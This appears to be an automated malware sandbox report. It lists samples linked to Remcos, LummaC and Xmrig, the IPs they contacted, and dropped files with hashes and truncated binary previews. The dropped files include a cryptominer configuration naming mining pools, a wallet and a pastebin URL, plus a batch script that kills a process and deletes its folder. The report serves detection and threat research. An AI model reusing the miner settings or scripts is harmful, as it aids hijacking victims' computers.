                                                                                                                                                                                        SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                        • 172.67.19.24
                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1Towservicesst.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        z5dejE5wp9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        JaDheaBFXI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        OD5lecPHBl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        Tu9UIpROEO.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        ftoHy3FsuB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        alarmer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        C:\ProgramData\Dllhost\WinRing0x64.sysICBM.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                          PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                                                                                                                            NH95Vhokye.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                              Eulen.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                U9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, XmrigBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                      ICBM.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                          file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14544
                                                                                                                                                                                                            Entropy (8bit):6.2660301556221185
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: PqSIlYOaIF.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: NH95Vhokye.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: Eulen.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: U9jAFGWgPG.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):128251
                                                                                                                                                                                                            Entropy (8bit):6.081637526239457
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:UzT+0mL07+utzhLbC9mRqglkQsiHcnUkht9UfLixLnMl51P8R8mZlnF4FPqk5cIs:Nvqn3jix8o8mDnFAZ5Lwt8tmLdz4AZr
                                                                                                                                                                                                            MD5:E2A7360AC976CE89B10E1B124B4BE9A3
                                                                                                                                                                                                            SHA1:380413544A25731708CEE50ED44CF28CDB09A097
                                                                                                                                                                                                            SHA-256:5CBABF851600A0647485BA2A3E8E4095A169FFC281BD4E6E8DBC91C194633532
                                                                                                                                                                                                            SHA-512:81B0EC780C6B1A7C57355C5B94F4F783CEA5FAAF6A46D66BFB4D9445B3FDE3AE94B19DD160E35838DDBBBCAA8B8BB40BD2AD8B4282A7BCBC98E42B1118E35316
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....c.d...............&.._...}...2............@.............................0......L|~...`... .................................................F...@...\....v.................l...........................`.t.(......................@............................text....._......._.................`..`.data...`.... _...... _.............@....rdata.......0`......&`.............@..@.pdata........v.......v.............@..@.xdata........y.......x.............@..@.bss......2...|..........................idata...F......H....|.............@....CRT....h.... ........|.............@....tls.........0........|.............@....rsrc....\...@...\....|.............@....reloc..l............X}.............@..B........................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):344
                                                                                                                                                                                                            Entropy (8bit):5.684574010345154
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAKZ:uwgyXmGwgyoH55GT2Qtyc3n1KAi
                                                                                                                                                                                                            MD5:FAC0827324A254D56B80351D3A0A676C
                                                                                                                                                                                                            SHA1:7140E81D0844422A4F1EB9C083D0E3F8B195CC89
                                                                                                                                                                                                            SHA-256:A12A06E88A3E1AD525A1F9D10227CF015C516705094DBEEC67BB1275B36064D1
                                                                                                                                                                                                            SHA-512:F84F82A35500701F6E80D926399B9C21B287A4A13981E7B646A26AAA831E53335EBF832ACAB367D01A778F1A35A0336C62938F66800D51CB2E00577113EEE122
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/dq3hWX27..
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2232
                                                                                                                                                                                                            Entropy (8bit):5.379677338874509
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:tWSU4y4RQmFoULF+gZ9tK8NPZHUxL7u1iMuge//8PUyus:tLHyIFKEDZ2KRHWLOug8s
                                                                                                                                                                                                            MD5:F347452DFD5F8C733FDD43199942C24C
                                                                                                                                                                                                            SHA1:F7F96D463E6A89D9DD3BAFF6B23A0BEB3F01D62C
                                                                                                                                                                                                            SHA-256:B327E43E83872FBEB384418C6FC1EB0CBC4AB11AA766DD35F16FE21EC36FF114
                                                                                                                                                                                                            SHA-512:434C135A238052277B17922BA150B6571429CE79EC68675876A6EAB1CC02D14FE828F17D23BC14363192EA6345CFDCCDB86DC407FCD0E1B19CC16DDC21CA5D84
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3125704
                                                                                                                                                                                                            Entropy (8bit):7.990259949871784
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:49152:MN5JrWK2CToOR1ewbLQZ5reodSTgYSFLDJzIAMAAAedMnMbw0gvbP/+3jxYQzbPI:MN5JrW2oo1ewbLQzegSTgNFLDRR4KMbw
                                                                                                                                                                                                            MD5:CE901A874C9D157E48F83B1BE3D32AA6
                                                                                                                                                                                                            SHA1:9BC12D5DB437C0673437E9FEAADD0027887D1C13
                                                                                                                                                                                                            SHA-256:35401B151F704F6BBBF4F8B36D886E4DC391809822181B396C02D243C0ACA7F0
                                                                                                                                                                                                            SHA-512:EA6511B4E318EB31E4DD8862CD7967906BD1705F2B1D6422B28424F0C810F9647702315B9BDCEA1FD32421E5D72B61027E9991DA6B779D6DE02B61E410EEB747
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                            Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@.................................X.0..............................................0...N...........u/..<..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....N...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3125704
                                                                                                                                                                                                            Entropy (8bit):7.990259949871784
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:49152:MN5JrWK2CToOR1ewbLQZ5reodSTgYSFLDJzIAMAAAedMnMbw0gvbP/+3jxYQzbPI:MN5JrW2oo1ewbLQzegSTgNFLDRR4KMbw
                                                                                                                                                                                                            MD5:CE901A874C9D157E48F83B1BE3D32AA6
                                                                                                                                                                                                            SHA1:9BC12D5DB437C0673437E9FEAADD0027887D1C13
                                                                                                                                                                                                            SHA-256:35401B151F704F6BBBF4F8B36D886E4DC391809822181B396C02D243C0ACA7F0
                                                                                                                                                                                                            SHA-512:EA6511B4E318EB31E4DD8862CD7967906BD1705F2B1D6422B28424F0C810F9647702315B9BDCEA1FD32421E5D72B61027E9991DA6B779D6DE02B61E410EEB747
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                            Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@.................................X.0..............................................0...N...........u/..<..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....N...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):344
                                                                                                                                                                                                            Entropy (8bit):5.684574010345154
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAKZ:uwgyXmGwgyoH55GT2Qtyc3n1KAi
                                                                                                                                                                                                            MD5:FAC0827324A254D56B80351D3A0A676C
                                                                                                                                                                                                            SHA1:7140E81D0844422A4F1EB9C083D0E3F8B195CC89
                                                                                                                                                                                                            SHA-256:A12A06E88A3E1AD525A1F9D10227CF015C516705094DBEEC67BB1275B36064D1
                                                                                                                                                                                                            SHA-512:F84F82A35500701F6E80D926399B9C21B287A4A13981E7B646A26AAA831E53335EBF832ACAB367D01A778F1A35A0336C62938F66800D51CB2E00577113EEE122
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/dq3hWX27..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1679360
                                                                                                                                                                                                            Entropy (8bit):6.278252955513617
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                                            MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                            SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                            SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                            SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe
                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):468992
                                                                                                                                                                                                            Entropy (8bit):6.157743912672224
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                                            MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                            SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                                            SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                                            SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):222
                                                                                                                                                                                                            Entropy (8bit):4.855194602218789
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                                            MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                                            SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                                            SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                                            SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2343406
                                                                                                                                                                                                            Entropy (8bit):5.89551469554261
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xR:R9kqGu7okoZscCnf0/Zs9k
                                                                                                                                                                                                            MD5:AEFFE98F08187C1796B0C19E28AFF08F
                                                                                                                                                                                                            SHA1:418740DFB8FA1EA685F78D7641586FCA0417BF8F
                                                                                                                                                                                                            SHA-256:6659A9416A334434BDE5035F119D84E7FFDC74C0B1364650E0A323AFB191FD87
                                                                                                                                                                                                            SHA-512:29F085F81CEF17F233103AC553199EED25C81E89CB8EB9DF4F24B32C68763DCF7498B50ABA10252496B2F19587B57885365019AE694BBE5BD6EACAD8E25AF370
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):625464
                                                                                                                                                                                                            Entropy (8bit):7.5510269559180125
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:dAcRtQRBRwAI/GE+g19EggvGkKj0cRgzAI/GE+g19EggvGkKj0cRgJ:rjybIeXuugoKocKUIeXuugoKocKJ
                                                                                                                                                                                                            MD5:89A069871324D35E25922F6FB881D514
                                                                                                                                                                                                            SHA1:985F31CD2E5B7B6C5AB6FF41CE33837987A06171
                                                                                                                                                                                                            SHA-256:7FAF92E0275F06214930A5EBBE11F1E98781CCD7CF4B95A0C23E5FCB013AD1AB
